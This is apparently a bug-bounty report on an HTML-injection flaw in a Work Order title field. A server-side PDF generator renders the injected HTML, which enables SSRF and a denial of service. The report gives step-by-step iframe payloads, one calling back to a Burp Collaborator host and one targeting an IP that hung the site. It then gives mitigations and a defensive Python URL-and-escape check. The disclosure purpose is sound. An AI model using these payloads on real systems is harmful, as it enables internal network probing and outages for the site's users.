PDF SSRF Leads to DoS

Description: The Domain.com application is affected by a serious HTML Injection vulnerability in the Work Order title field. This issue becomes exploitable when the system generates a PDF, as the backend PDF engine processes the injected HTML and attempts to load any external resources referenced inside it. Since these requests are made by the server itself, the behavior can be abused to perform Server-Side Request Forgery (SSRF).
By inserting specially crafted HTML, an attacker can force the Domain.com server to request internal or external URLs. This enables probing of internal network services that are not accessible from the internet, as well as triggering callbacks to attacker-controlled domains to confirm successful SSRF. During testing, attempting to load the IP address 34.96.46.197 caused the PDF generator to hang, resulting in a complete Denial of Service (DoS) where the PDF export feature stopped working for all users.
This vulnerability combines HTML Injection, SSRF, and potential DoS impact, giving attackers the ability to interact with internal systems, verify exploitation externally, and disrupt core application functionality, making it a high-risk security issue.

Step 1:
Login as an Admin/User and navigate to Work Orders.
Step 2:
Edit the Work Order title and inject the following payload:
"><iframe src="https://el3vnedo5e88fil07h3zrk6w6nce32s.burpcollaborator.net">

Step 3:
Click Export to PDF.

Step 4:
Observe the server-side behavior: the content appears in the Burp Collaborator client, and on my server I got access to the internal IP.

IMP: Also, if we try to load the IP 11.11.111.111 using the same method, it performs a DoS on the system and then no

Step 5:
I loaded the target IP inside an iframe using the following payload:
"><iframe src=11.11.111.111>
As soon as this payload was processed during PDF export, the server attempted to load the IP address. This caused the PDF export feature—and eventually the entire website—to become unresponsive, resulting in a complete Denial of Service (DoS). The iframe forced the backend to repeatedly request the server IP, which overloaded the system and brought the site down.

Impact
- Server-Side Request Forgery (SSRF): Potential access to internal network services and cloud instance metadata.
- Information Disclosure: Reveals internal IP addresses, cloud metadata, and network topology.
- Chained Exploitation: Could lead to Remote Code Execution (RCE) if internal services are insecure.

Mitigation & Recommendations
- Sanitize and Escape HTML Inputs in fields that are exported to PDF.
- Use a Secure PDF Rendering Library that blocks or restricts external resource fetching.
- Implement SSRF Protection: Block requests to private/internal IP ranges (127.0.0.0/8, 169.254.0.0/16, 10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16).
- Disable External Resource Loading in PDF generation.
- Monitor and Log All Outgoing Requests from PDF generation servers.
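
One way to implement the first and third recommendations above, as an added example that is not the application's own code: the title is escaped before it reaches the PDF template, and a resource URL is allowed only if every address its host resolves to falls outside the blocked ranges. The function names, the injectable resolver, the IPv6 ranges and the sample hostnames are assumptions made for illustration.

```python
import html
import ipaddress
import socket
from urllib.parse import urlsplit

# IPv4 ranges from the recommendation above; the IPv6 entries are an added assumption.
BLOCKED_NETS = [ipaddress.ip_network(n) for n in (
    "127.0.0.0/8", "169.254.0.0/16", "10.0.0.0/8", "172.16.0.0/12",
    "192.168.0.0/16", "::1/128", "fc00::/7", "fe80::/10",
)]


def escape_title(title):
    """Escape a user-supplied title before it goes into the PDF's HTML template."""
    return html.escape(title, quote=True)


def system_resolver(host):
    """Resolve a hostname to the addresses the renderer would connect to."""
    return [info[4][0] for info in socket.getaddrinfo(host, None)]


def is_fetch_allowed(url, resolver=system_resolver):
    """True only if url is http(s) and every resolved address is outside BLOCKED_NETS."""
    try:
        parts = urlsplit(url)
        if parts.scheme not in ("http", "https") or not parts.hostname:
            return False
        addrs = [ipaddress.ip_address(a) for a in resolver(parts.hostname)]
    except (OSError, ValueError):
        return False  # unresolvable or unparsable: fail closed
    if not addrs:
        return False
    for addr in addrs:
        # Treat ::ffff:10.0.0.5 as 10.0.0.5 so the IPv4 rules still apply.
        if addr.version == 6 and addr.ipv4_mapped is not None:
            addr = addr.ipv4_mapped
        if any(addr in net for net in BLOCKED_NETS):
            return False
    return True


if __name__ == "__main__":
    # Constructed sample data: hostnames and addresses are placeholders.
    fake_dns = {"cdn.example": ["93.184.216.34"], "meta.example": ["169.254.169.254"]}
    for u in ("https://cdn.example/logo.png", "http://meta.example/latest/"):
        print(u, is_fetch_allowed(u, fake_dns.__getitem__))
    print(escape_title('"><iframe src=11.11.111.111>'))
```

The check only holds if the renderer connects to the same address that was validated and re-applies it to redirects. A short connect and read timeout on the fetch bounds the hang described in Step 5.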